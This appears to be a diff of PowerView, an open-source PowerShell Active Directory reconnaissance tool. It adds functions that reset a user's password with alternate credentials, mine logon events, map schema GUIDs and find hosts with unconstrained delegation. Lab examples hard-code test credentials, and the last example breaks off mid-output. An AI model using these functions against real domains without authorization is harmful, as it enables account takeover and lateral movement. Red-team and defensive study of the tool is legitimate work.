- $Result = $GroupSearcher.FindOne() - $RangedProperty = $Result.Properties.PropertyNames -like "member;range=*" - $Members += $Result.Properties.item($RangedProperty) - $GroupFoundName = $Result.properties.item("samaccountname")[0] +.PARAMETER AccountPassword - if ($Members.count -eq 0) { - $Finished = $True - } - } - catch [System.Management.Automation.MethodInvocationException] { - $Finished = $True - } - } - } - else { - $GroupFoundName = $Result.properties.item("samaccountname")[0] - $Members += $Result.Properties.item($RangedProperty) - } - } - $GroupSearcher.dispose() - } +Specifies the password to reset the target user's to. Mandatory. - $Members | Where-Object {$_} | ForEach-Object { - # if we're doing the LDAP_MATCHING_RULE_IN_CHAIN recursion - if ($Recurse -and $UseMatchingRule) { - $Properties = $_.Properties - } - else { - if($TargetDomainController) { - $Result = [adsi]"LDAP://$TargetDomainController/$_" - } - else { - $Result = [adsi]"LDAP://$_" - } - if($Result){ - $Properties = $Result.Properties - } - } +.PARAMETER Domain - if($Properties) { +Specifies the domain to use to search for the user identity, defaults to the current domain. - $IsGroup = @('268435456','268435457','536870912','536870913') -contains $Properties.samaccounttype +.PARAMETER Credential - if ($FullData) { - $GroupMember = Convert-LDAPProperty -Properties $Properties - } - else { - $GroupMember = New-Object PSObject - } +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. - $GroupMember | Add-Member Noteproperty 'GroupDomain' $TargetDomain - $GroupMember | Add-Member Noteproperty 'GroupName' $GroupFoundName +.EXAMPLE - if($Properties.objectSid) { - $MemberSID = ((New-Object System.Security.Principal.SecurityIdentifier $Properties.objectSid[0],0).Value) - } - else { - $MemberSID = $Null - } +$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +Set-DomainUserPassword -Identity andy -AccountPassword $UserPassword - try { - $MemberDN = $Properties.distinguishedname[0] +Resets the password for 'andy' to the password specified. - if (($MemberDN -match 'ForeignSecurityPrincipals') -and ($MemberDN -match 'S-1-5-21')) { - try { - if(-not $MemberSID) { - $MemberSID = $Properties.cn[0] - } - $MemberSimpleName = Convert-SidToName -SID $MemberSID | Convert-ADName -InputType 'NT4' -OutputType 'Simple' - if($MemberSimpleName) { - $MemberDomain = $MemberSimpleName.Split('@')[1] - } - else { - Write-Warning "Error converting $MemberDN" - $MemberDomain = $Null - } - } - catch { - Write-Warning "Error converting $MemberDN" - $MemberDomain = $Null - } - } - else { - # extract the FQDN from the Distinguished Name - $MemberDomain = $MemberDN.subString($MemberDN.IndexOf("DC=")) -replace 'DC=','' -replace ',','.' - } - } - catch { - $MemberDN = $Null - $MemberDomain = $Null - } +.EXAMPLE - if ($Properties.samaccountname) { - # forest users have the samAccountName set - $MemberName = $Properties.samaccountname[0] - } - else { - # external trust users have a SID, so convert it - try { - $MemberName = Convert-SidToName $Properties.cn[0] - } - catch { - # if there's a problem contacting the domain to resolve the SID - $MemberName = $Properties.cn - } - } +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +Set-DomainUserPassword -Identity andy -AccountPassword $UserPassword -Credential $Cred - $GroupMember | Add-Member Noteproperty 'MemberDomain' $MemberDomain - $GroupMember | Add-Member Noteproperty 'MemberName' $MemberName - $GroupMember | Add-Member Noteproperty 'MemberSID' $MemberSID - $GroupMember | Add-Member Noteproperty 'IsGroup' $IsGroup - $GroupMember | Add-Member Noteproperty 'MemberDN' $MemberDN - $GroupMember.PSObject.TypeNames.Add('PowerView.GroupMember') - $GroupMember +Resets the password for 'andy' usering the alternate credentials specified. - # if we're doing manual recursion - if ($Recurse -and !$UseMatchingRule -and $IsGroup -and $MemberName) { - if($FullData) { - Get-NetGroupMember -FullData -Domain $MemberDomain -DomainController $TargetDomainController -Credential $Credential -GroupName $MemberName -Recurse -PageSize $PageSize - } +.OUTPUTS + +DirectoryServices.AccountManagement.UserPrincipal + +.LINK + +http://richardspowershellblog.wordpress.com/2008/05/25/system-directoryservices-accountmanagement/ +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('DirectoryServices.AccountManagement.UserPrincipal')] + Param( + [Parameter(Position = 0, Mandatory = $True)] + [Alias('UserName', 'UserIdentity', 'User')] + [String] + $Identity, + + [Parameter(Mandatory = $True)] + [ValidateNotNullOrEmpty()] + [Alias('Password')] + [Security.SecureString] + $AccountPassword, + + [ValidateNotNullOrEmpty()] + [String] + $Domain, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + $ContextArguments = @{ 'Identity' = $Identity } + if ($PSBoundParameters['Domain']) { $ContextArguments['Domain'] = $Domain } + if ($PSBoundParameters['Credential']) { $ContextArguments['Credential'] = $Credential } + $Context = Get-PrincipalContext @ContextArguments + + if ($Context) { + $User = [System.DirectoryServices.AccountManagement.UserPrincipal]::FindByIdentity($Context.Context, $Identity) + + if ($User) { + Write-Verbose "[Set-DomainUserPassword] Attempting to set the password for user '$Identity'" + try { + $TempCred = New-Object System.Management.Automation.PSCredential('a', $AccountPassword) + $User.SetPassword($TempCred.GetNetworkCredential().Password) + + $Null = $User.Save() + Write-Verbose "[Set-DomainUserPassword] Password for user '$Identity' successfully reset" + } + catch { + Write-Warning "[Set-DomainUserPassword] Error setting password for user '$Identity' : $_" + } + } + else { + Write-Warning "[Set-DomainUserPassword] Unable to find user '$Identity'" + } + } +} + + +function Get-DomainUserEvent { +<# +.SYNOPSIS + +Enumerate account logon events (ID 4624) and Logon with explicit credential +events (ID 4648) from the specified host (default of the localhost). + +Author: Lee Christensen (@tifkin_), Justin Warner (@sixdub), Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None + +.DESCRIPTION + +This function uses an XML path filter passed to Get-WinEvent to retrieve +security events with IDs of 4624 (logon events) or 4648 (explicit credential +logon events) from -StartTime (default of now-1 day) to -EndTime (default of now). +A maximum of -MaxEvents (default of 5000) are returned. + +.PARAMETER ComputerName + +Specifies the computer name to retrieve events from, default of localhost. + +.PARAMETER StartTime + +The [DateTime] object representing the start of when to collect events. +Default of [DateTime]::Now.AddDays(-1). + +.PARAMETER EndTime + +The [DateTime] object representing the end of when to collect events. +Default of [DateTime]::Now. + +.PARAMETER MaxEvents + +The maximum number of events to retrieve. Default of 5000. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target computer. + +.EXAMPLE + +Get-DomainUserEvent + +Return logon events on the local machine. + +.EXAMPLE + +Get-DomainController | Get-DomainUserEvent -StartTime ([DateTime]::Now.AddDays(-3)) + +Return all logon events from the last 3 days from every domain controller in the current domain. + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainUserEvent -ComputerName PRIMARY.testlab.local -Credential $Cred -MaxEvents 1000 + +Return a max of 1000 logon events from the specified machine using the specified alternate credentials. + +.OUTPUTS + +PowerView.LogonEvent + +PowerView.ExplicitCredentialLogonEvent + +.LINK + +http://www.sixdub.net/2014/11/07/offensive-event-parsing-bringing-home-trophies/ +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('PowerView.LogonEvent')] + [OutputType('PowerView.ExplicitCredentialLogonEvent')] + [CmdletBinding()] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('dnshostname', 'HostName', 'name')] + [ValidateNotNullOrEmpty()] + [String[]] + $ComputerName = $Env:COMPUTERNAME, + + [ValidateNotNullOrEmpty()] + [DateTime] + $StartTime = [DateTime]::Now.AddDays(-1), + + [ValidateNotNullOrEmpty()] + [DateTime] + $EndTime = [DateTime]::Now, + + [ValidateRange(1, 1000000)] + [Int] + $MaxEvents = 5000, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + BEGIN { + # the XML filter we're passing to Get-WinEvent + $XPathFilter = @" + + + + + + + + + + + *[ + System[ + Provider[ + @Name='Microsoft-Windows-Security-Auditing' + ] + and + (Level=4 or Level=0) and (EventID=4624 or EventID=4625 or EventID=4634) + ] + ] + and + *[ + EventData[ + ( + (Data[@Name='LogonType']='5' or Data[@Name='LogonType']='0') + or + Data[@Name='TargetUserName']='ANONYMOUS LOGON' + or + Data[@Name='TargetUserSID']='S-1-5-18' + ) + ] + ] + + + +"@ + $EventArguments = @{ + 'FilterXPath' = $XPathFilter + 'LogName' = 'Security' + 'MaxEvents' = $MaxEvents + } + if ($PSBoundParameters['Credential']) { $EventArguments['Credential'] = $Credential } + } + + PROCESS { + ForEach ($Computer in $ComputerName) { + + $EventArguments['ComputerName'] = $Computer + + Get-WinEvent @EventArguments| ForEach-Object { + $Event = $_ + $Properties = $Event.Properties + Switch ($Event.Id) { + # logon event + 4624 { + # skip computer logons, for now... + if(-not $Properties[5].Value.EndsWith('$')) { + $Output = New-Object PSObject -Property @{ + ComputerName = $Computer + TimeCreated = $Event.TimeCreated + EventId = $Event.Id + SubjectUserSid = $Properties[0].Value.ToString() + SubjectUserName = $Properties[1].Value + SubjectDomainName = $Properties[2].Value + SubjectLogonId = $Properties[3].Value + TargetUserSid = $Properties[4].Value.ToString() + TargetUserName = $Properties[5].Value + TargetDomainName = $Properties[6].Value + TargetLogonId = $Properties[7].Value + LogonType = $Properties[8].Value + LogonProcessName = $Properties[9].Value + AuthenticationPackageName = $Properties[10].Value + WorkstationName = $Properties[11].Value + LogonGuid = $Properties[12].Value + TransmittedServices = $Properties[13].Value + LmPackageName = $Properties[14].Value + KeyLength = $Properties[15].Value + ProcessId = $Properties[16].Value + ProcessName = $Properties[17].Value + IpAddress = $Properties[18].Value + IpPort = $Properties[19].Value + ImpersonationLevel = $Properties[20].Value + RestrictedAdminMode = $Properties[21].Value + TargetOutboundUserName = $Properties[22].Value + TargetOutboundDomainName = $Properties[23].Value + VirtualAccount = $Properties[24].Value + TargetLinkedLogonId = $Properties[25].Value + ElevatedToken = $Properties[26].Value + } + $Output.PSObject.TypeNames.Insert(0, 'PowerView.LogonEvent') + $Output + } + } + + # logon with explicit credential + 4648 { + # skip computer logons, for now... + if((-not $Properties[5].Value.EndsWith('$')) -and ($Properties[11].Value -match 'taskhost\.exe')) { + $Output = New-Object PSObject -Property @{ + ComputerName = $Computer + TimeCreated = $Event.TimeCreated + EventId = $Event.Id + SubjectUserSid = $Properties[0].Value.ToString() + SubjectUserName = $Properties[1].Value + SubjectDomainName = $Properties[2].Value + SubjectLogonId = $Properties[3].Value + LogonGuid = $Properties[4].Value.ToString() + TargetUserName = $Properties[5].Value + TargetDomainName = $Properties[6].Value + TargetLogonGuid = $Properties[7].Value + TargetServerName = $Properties[8].Value + TargetInfo = $Properties[9].Value + ProcessId = $Properties[10].Value + ProcessName = $Properties[11].Value + IpAddress = $Properties[12].Value + IpPort = $Properties[13].Value + } + $Output.PSObject.TypeNames.Insert(0, 'PowerView.ExplicitCredentialLogonEvent') + $Output + } + } + default { + Write-Warning "No handler exists for event ID: $($Event.Id)" + } + } + } + } + } +} + + +function Get-DomainGUIDMap { +<# +.SYNOPSIS + +Helper to build a hash table of [GUID] -> resolved names for the current or specified Domain. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainSearcher, Get-Forest + +.DESCRIPTION + +Searches the forest schema location (CN=Schema,CN=Configuration,DC=testlab,DC=local) for +all objects with schemaIDGUID set and translates the GUIDs discovered to human-readable names. +Then searches the extended rights location (CN=Extended-Rights,CN=Configuration,DC=testlab,DC=local) +for objects where objectClass=controlAccessRight, translating the GUIDs again. + +Heavily adapted from http://blogs.technet.com/b/ashleymcglone/archive/2013/03/25/active-directory-ou-permissions-report-free-powershell-script-download.aspx + +.PARAMETER Domain + +Specifies the domain to use for the query, defaults to the current domain. + +.PARAMETER Server + +Specifies an Active Directory server (domain controller) to bind to. + +.PARAMETER ResultPageSize + +Specifies the PageSize to set for the LDAP searcher object. + +.PARAMETER ServerTimeLimit + +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.OUTPUTS + +Hashtable + +Ouputs a hashtable containing a GUID -> Readable Name mapping. + +.LINK + +http://blogs.technet.com/b/ashleymcglone/archive/2013/03/25/active-directory-ou-permissions-report-free-powershell-script-download.aspx +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType([Hashtable])] + [CmdletBinding()] + Param ( + [ValidateNotNullOrEmpty()] + [String] + $Domain, + + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, + + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + $GUIDs = @{'00000000-0000-0000-0000-000000000000' = 'All'} + + $ForestArguments = @{} + if ($PSBoundParameters['Credential']) { $ForestArguments['Credential'] = $Credential } + + try { + $SchemaPath = (Get-Forest @ForestArguments).schema.name + } + catch { + throw '[Get-DomainGUIDMap] Error in retrieving forest schema path from Get-Forest' + } + if (-not $SchemaPath) { + throw '[Get-DomainGUIDMap] Error in retrieving forest schema path from Get-Forest' + } + + $SearcherArguments = @{ + 'SearchBase' = $SchemaPath + 'LDAPFilter' = '(schemaIDGUID=*)' + } + if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain } + if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server } + if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential } + $SchemaSearcher = Get-DomainSearcher @SearcherArguments + + if ($SchemaSearcher) { + try { + $Results = $SchemaSearcher.FindAll() + $Results | Where-Object {$_} | ForEach-Object { + $GUIDs[(New-Object Guid (,$_.properties.schemaidguid[0])).Guid] = $_.properties.name[0] + } + if ($Results) { + try { $Results.dispose() } + catch { + Write-Verbose "[Get-DomainGUIDMap] Error disposing of the Results object: $_" + } + } + $SchemaSearcher.dispose() + } + catch { + Write-Verbose "[Get-DomainGUIDMap] Error in building GUID map: $_" + } + } + + $SearcherArguments['SearchBase'] = $SchemaPath.replace('Schema','Extended-Rights') + $SearcherArguments['LDAPFilter'] = '(objectClass=controlAccessRight)' + $RightsSearcher = Get-DomainSearcher @SearcherArguments + + if ($RightsSearcher) { + try { + $Results = $RightsSearcher.FindAll() + $Results | Where-Object {$_} | ForEach-Object { + $GUIDs[$_.properties.rightsguid[0].toString()] = $_.properties.name[0] + } + if ($Results) { + try { $Results.dispose() } + catch { + Write-Verbose "[Get-DomainGUIDMap] Error disposing of the Results object: $_" + } + } + $RightsSearcher.dispose() + } + catch { + Write-Verbose "[Get-DomainGUIDMap] Error in building GUID map: $_" + } + } + + $GUIDs +} + + +function Get-DomainComputer { +<# +.SYNOPSIS + +Return all computers or specific computer objects in AD. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainSearcher, Convert-LDAPProperty + +.DESCRIPTION + +Builds a directory searcher object using Get-DomainSearcher, builds a custom +LDAP filter based on targeting/filter parameters, and searches for all objects +matching the criteria. To only return specific properties, use +"-Properties samaccountname,usnchanged,...". By default, all computer objects for +the current domain are returned. + +.PARAMETER Identity + +A SamAccountName (e.g. WINDOWS10$), DistinguishedName (e.g. CN=WINDOWS10,CN=Computers,DC=testlab,DC=local), +SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1124), GUID (e.g. 4f16b6bc-7010-4cbf-b628-f3cfe20f6994), +or a dns host name (e.g. windows10.testlab.local). Wildcards accepted. + +.PARAMETER UACFilter + +Dynamic parameter that accepts one or more values from $UACEnum, including +"NOT_X" negation forms. To see all possible values, run '0|ConvertFrom-UACValue -ShowAll'. + +.PARAMETER Unconstrained + +Switch. Return computer objects that have unconstrained delegation. + +.PARAMETER TrustedToAuth + +Switch. Return computer objects that are trusted to authenticate for other principals. + +.PARAMETER Printers + +Switch. Return only printers. + +.PARAMETER SPN + +Return computers with a specific service principal name, wildcards accepted. + +.PARAMETER OperatingSystem + +Return computers with a specific operating system, wildcards accepted. + +.PARAMETER ServicePack + +Return computers with a specific service pack, wildcards accepted. + +.PARAMETER SiteName + +Return computers in the specific AD Site name, wildcards accepted. + +.PARAMETER Ping + +Switch. Ping each host to ensure it's up before enumerating. + +.PARAMETER Domain + +Specifies the domain to use for the query, defaults to the current domain. + +.PARAMETER LDAPFilter + +Specifies an LDAP query string that is used to filter Active Directory objects. + +.PARAMETER Properties + +Specifies the properties of the output object to retrieve from the server. + +.PARAMETER SearchBase + +The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +.PARAMETER Server + +Specifies an Active Directory server (domain controller) to bind to. + +.PARAMETER SearchScope + +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +.PARAMETER ResultPageSize + +Specifies the PageSize to set for the LDAP searcher object. + +.PARAMETER ServerTimeLimit + +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. + +.PARAMETER SecurityMasks + +Specifies an option for examining security information of a directory object. +One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'. + +.PARAMETER Tombstone + +Switch. Specifies that the searcher should also return deleted/tombstoned objects. + +.PARAMETER FindOne + +Only return one result object. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.PARAMETER Raw + +Switch. Return raw results instead of translating the fields into a custom PSObject. + +.EXAMPLE + +Get-DomainComputer + +Returns the current computers in current domain. + +.EXAMPLE + +Get-DomainComputer -SPN mssql* -Domain testlab.local + +Returns all MS SQL servers in the testlab.local domain. + +.EXAMPLE + +Get-DomainComputer -UACFilter TRUSTED_FOR_DELEGATION,SERVER_TRUST_ACCOUNT -Properties dnshostname + +Return the dns hostnames of servers trusted for delegation. + +.EXAMPLE + +Get-DomainComputer -SearchBase "LDAP://OU=secret,DC=testlab,DC=local" -Unconstrained + +Search the specified OU for computeres that allow unconstrained delegation. + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainComputer -Credential $Cred + +.OUTPUTS + +PowerView.Computer + +Custom PSObject with translated computer property fields. + +PowerView.Computer.Raw + +The raw DirectoryServices.SearchResult object, if -Raw is enabled. +#> + + [OutputType('PowerView.Computer')] + [OutputType('PowerView.Computer.Raw')] + [CmdletBinding()] + Param ( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('SamAccountName', 'Name', 'DNSHostName')] + [String[]] + $Identity, + + [Switch] + $Unconstrained, + + [Switch] + $TrustedToAuth, + + [Switch] + $Printers, + + [ValidateNotNullOrEmpty()] + [Alias('ServicePrincipalName')] + [String] + $SPN, + + [ValidateNotNullOrEmpty()] + [String] + $OperatingSystem, + + [ValidateNotNullOrEmpty()] + [String] + $ServicePack, + + [ValidateNotNullOrEmpty()] + [String] + $SiteName, + + [Switch] + $Ping, + + [ValidateNotNullOrEmpty()] + [String] + $Domain, + + [ValidateNotNullOrEmpty()] + [Alias('Filter')] + [String] + $LDAPFilter, + + [ValidateNotNullOrEmpty()] + [String[]] + $Properties, + + [ValidateNotNullOrEmpty()] + [Alias('ADSPath')] + [String] + $SearchBase, + + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [ValidateSet('Base', 'OneLevel', 'Subtree')] + [String] + $SearchScope = 'Subtree', + + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, + + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, + + [ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')] + [String] + $SecurityMasks, + + [Switch] + $Tombstone, + + [Alias('ReturnOne')] + [Switch] + $FindOne, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty, + + [Switch] + $Raw + ) + + DynamicParam { + $UACValueNames = [Enum]::GetNames($UACEnum) + # add in the negations + $UACValueNames = $UACValueNames | ForEach-Object {$_; "NOT_$_"} + # create new dynamic parameter + New-DynamicParameter -Name UACFilter -ValidateSet $UACValueNames -Type ([array]) + } + + BEGIN { + $SearcherArguments = @{} + if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain } + if ($PSBoundParameters['Properties']) { $SearcherArguments['Properties'] = $Properties } + if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase } + if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['SecurityMasks']) { $SearcherArguments['SecurityMasks'] = $SecurityMasks } + if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential } + $CompSearcher = Get-DomainSearcher @SearcherArguments + } + + PROCESS { + #bind dynamic parameter to a friendly variable + if ($PSBoundParameters -and ($PSBoundParameters.Count -ne 0)) { + New-DynamicParameter -CreateVariables -BoundParameters $PSBoundParameters + } + + if ($CompSearcher) { + $IdentityFilter = '' + $Filter = '' + $Identity | Where-Object {$_} | ForEach-Object { + $IdentityInstance = $_.Replace('(', '\28').Replace(')', '\29') + if ($IdentityInstance -match '^S-1-') { + $IdentityFilter += "(objectsid=$IdentityInstance)" + } + elseif ($IdentityInstance -match '^CN=') { + $IdentityFilter += "(distinguishedname=$IdentityInstance)" + if ((-not $PSBoundParameters['Domain']) -and (-not $PSBoundParameters['SearchBase'])) { + # if a -Domain isn't explicitly set, extract the object domain out of the distinguishedname + # and rebuild the domain searcher + $IdentityDomain = $IdentityInstance.SubString($IdentityInstance.IndexOf('DC=')) -replace 'DC=','' -replace ',','.' + Write-Verbose "[Get-DomainComputer] Extracted domain '$IdentityDomain' from '$IdentityInstance'" + $SearcherArguments['Domain'] = $IdentityDomain + $CompSearcher = Get-DomainSearcher @SearcherArguments + if (-not $CompSearcher) { + Write-Warning "[Get-DomainComputer] Unable to retrieve domain searcher for '$IdentityDomain'" + } + } + } + elseif ($IdentityInstance.Contains('.')) { + $IdentityFilter += "(|(name=$IdentityInstance)(dnshostname=$IdentityInstance))" + } + elseif ($IdentityInstance -imatch '^[0-9A-F]{8}-([0-9A-F]{4}-){3}[0-9A-F]{12}$') { + $GuidByteString = (([Guid]$IdentityInstance).ToByteArray() | ForEach-Object { '\' + $_.ToString('X2') }) -join '' + $IdentityFilter += "(objectguid=$GuidByteString)" + } + else { + $IdentityFilter += "(name=$IdentityInstance)" + } + } + if ($IdentityFilter -and ($IdentityFilter.Trim() -ne '') ) { + $Filter += "(|$IdentityFilter)" + } + + if ($PSBoundParameters['Unconstrained']) { + Write-Verbose '[Get-DomainComputer] Searching for computers with for unconstrained delegation' + $Filter += '(userAccountControl:1.2.840.113556.1.4.803:=524288)' + } + if ($PSBoundParameters['TrustedToAuth']) { + Write-Verbose '[Get-DomainComputer] Searching for computers that are trusted to authenticate for other principals' + $Filter += '(msds-allowedtodelegateto=*)' + } + if ($PSBoundParameters['Printers']) { + Write-Verbose '[Get-DomainComputer] Searching for printers' + $Filter += '(objectCategory=printQueue)' + } + if ($PSBoundParameters['SPN']) { + Write-Verbose "[Get-DomainComputer] Searching for computers with SPN: $SPN" + $Filter += "(servicePrincipalName=$SPN)" + } + if ($PSBoundParameters['OperatingSystem']) { + Write-Verbose "[Get-DomainComputer] Searching for computers with operating system: $OperatingSystem" + $Filter += "(operatingsystem=$OperatingSystem)" + } + if ($PSBoundParameters['ServicePack']) { + Write-Verbose "[Get-DomainComputer] Searching for computers with service pack: $ServicePack" + $Filter += "(operatingsystemservicepack=$ServicePack)" + } + if ($PSBoundParameters['SiteName']) { + Write-Verbose "[Get-DomainComputer] Searching for computers with site name: $SiteName" + $Filter += "(serverreferencebl=$SiteName)" + } + if ($PSBoundParameters['LDAPFilter']) { + Write-Verbose "[Get-DomainComputer] Using additional LDAP filter: $LDAPFilter" + $Filter += "$LDAPFilter" + } + # build the LDAP filter for the dynamic UAC filter value + $UACFilter | Where-Object {$_} | ForEach-Object { + if ($_ -match 'NOT_.*') { + $UACField = $_.Substring(4) + $UACValue = [Int]($UACEnum::$UACField) + $Filter += "(!(userAccountControl:1.2.840.113556.1.4.803:=$UACValue))" + } + else { + $UACValue = [Int]($UACEnum::$_) + $Filter += "(userAccountControl:1.2.840.113556.1.4.803:=$UACValue)" + } + } + + $CompSearcher.filter = "(&(samAccountType=805306369)$Filter)" + Write-Verbose "[Get-DomainComputer] Get-DomainComputer filter string: $($CompSearcher.filter)" + + if ($PSBoundParameters['FindOne']) { $Results = $CompSearcher.FindOne() } + else { $Results = $CompSearcher.FindAll() } + $Results | Where-Object {$_} | ForEach-Object { + $Up = $True + if ($PSBoundParameters['Ping']) { + $Up = Test-Connection -Count 1 -Quiet -ComputerName $_.properties.dnshostname + } + if ($Up) { + if ($PSBoundParameters['Raw']) { + # return raw result objects + $Computer = $_ + $Computer.PSObject.TypeNames.Insert(0, 'PowerView.Computer.Raw') + } + else { + $Computer = Convert-LDAPProperty -Properties $_.Properties + $Computer.PSObject.TypeNames.Insert(0, 'PowerView.Computer') + } + $Computer + } + } + if ($Results) { + try { $Results.dispose() } + catch { + Write-Verbose "[Get-DomainComputer] Error disposing of the Results object: $_" + } + } + $CompSearcher.dispose() + } + } +} + + +function Get-DomainObject { +<# +.SYNOPSIS + +Return all (or specified) domain objects in AD. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainSearcher, Convert-LDAPProperty, Convert-ADName + +.DESCRIPTION + +Builds a directory searcher object using Get-DomainSearcher, builds a custom +LDAP filter based on targeting/filter parameters, and searches for all objects +matching the criteria. To only return specific properties, use +"-Properties samaccountname,usnchanged,...". By default, all objects for +the current domain are returned. + +.PARAMETER Identity + +A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local), +SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201). +Wildcards accepted. + +.PARAMETER UACFilter + +Dynamic parameter that accepts one or more values from $UACEnum, including +"NOT_X" negation forms. To see all possible values, run '0|ConvertFrom-UACValue -ShowAll'. + +.PARAMETER Domain + +Specifies the domain to use for the query, defaults to the current domain. + +.PARAMETER LDAPFilter + +Specifies an LDAP query string that is used to filter Active Directory objects. + +.PARAMETER Properties + +Specifies the properties of the output object to retrieve from the server. + +.PARAMETER SearchBase + +The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +.PARAMETER Server + +Specifies an Active Directory server (domain controller) to bind to. + +.PARAMETER SearchScope + +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +.PARAMETER ResultPageSize + +Specifies the PageSize to set for the LDAP searcher object. + +.PARAMETER ServerTimeLimit + +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. + +.PARAMETER SecurityMasks + +Specifies an option for examining security information of a directory object. +One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'. + +.PARAMETER Tombstone + +Switch. Specifies that the searcher should also return deleted/tombstoned objects. + +.PARAMETER FindOne + +Only return one result object. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.PARAMETER Raw + +Switch. Return raw results instead of translating the fields into a custom PSObject. + +.EXAMPLE + +Get-DomainObject -Domain testlab.local + +Return all objects for the testlab.local domain + +.EXAMPLE + +'S-1-5-21-890171859-3433809279-3366196753-1003', 'CN=dfm,CN=Users,DC=testlab,DC=local','b6a9a2fb-bbd5-4f28-9a09-23213cea6693','dfm.a' | Get-DomainObject -Properties distinguishedname + +distinguishedname +----------------- +CN=PRIMARY,OU=Domain Controllers,DC=testlab,DC=local +CN=dfm,CN=Users,DC=testlab,DC=local +OU=OU3,DC=testlab,DC=local +CN=dfm (admin),CN=Users,DC=testlab,DC=local + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainObject -Credential $Cred -Identity 'windows1' + +.EXAMPLE + +Get-Domain | Select-Object -Expand name +testlab.local + +'testlab\harmj0y','DEV\Domain Admins' | Get-DomainObject -Verbose -Properties distinguishedname +VERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local +VERBOSE: [Get-DomainUser] Extracted domain 'testlab.local' from 'testlab\harmj0y' +VERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local +VERBOSE: [Get-DomainObject] Get-DomainObject filter string: 